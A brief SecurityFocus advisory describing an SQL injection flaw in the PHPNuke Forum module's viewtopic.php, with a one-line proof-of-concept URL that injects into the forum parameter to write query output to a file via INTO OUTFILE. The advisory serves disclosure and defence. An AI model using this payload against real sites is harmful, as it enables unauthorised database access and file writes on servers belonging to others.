PHPNuke Forum Module Viewtopic.php SQL Injection Vulnerability

The following proof of concept was supplied:

http://www.example.com/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt


 

Privacy Statement
Copyright 2010, SecurityFocus